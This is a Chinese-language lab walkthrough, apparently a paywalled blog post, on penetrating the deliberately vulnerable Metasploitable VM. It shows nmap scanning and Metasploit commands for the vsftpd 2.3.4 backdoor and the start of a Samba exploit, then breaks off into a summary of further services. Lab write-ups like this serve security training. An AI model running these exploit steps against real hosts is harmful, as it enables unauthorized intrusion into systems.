靶机下载地址:Download Metasploitable - Intentionally Vulnerable Machine | Rapid7
安装方法:下载后直接用vmware打开使用,不需要安装
一、信息收集
扫描靶机开启的服务
nmap -sV 192.168.180.133
这里看到有很多端口和服务,我们一个一个来
二、渗透测试
1、21端口/vsftpd 2.3.4
此版本的vsftpd可能存在笑脸漏洞,我们进行测试
打开msfconsole漏洞测试平台
搜索vsftpd
search vsftpd
使用exploit/unix/ftp/vsftpd_234_backdoor漏洞攻击模块
use 0
查看漏洞需要配置的参数
show options
设置目标IP
set RHOSTS 192.168.180.133
运行
run
成功获取到靶机权限
2、139 | 445 Samba smbd 3.X - 4.X
Samba漏洞影响版本 Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间,条件符合我们进行渗透测试
打开msfconsole漏洞测试平台
搜索samba漏洞攻击模块
search samba
使用此模块
use 8
查看此模块需要配置的参数
show options

该文详细描述了对Metasploitable靶机的渗透测试过程,包括VSFTPD的笑脸漏洞、Samba服务的漏洞、弱口令服务(如SSH、Telnet、MySQL、PostgreSQL、VNC)的利用,以及JavaRMIServer、NFS、UnrealIRCd、Ingreslock后门和Tomcat管理台弱口令的渗透测试。通过msfconsole等工具,成功获取了靶机的权限。
最低0.47元/天 解锁文章
1837

被折叠的 条评论
为什么被折叠?



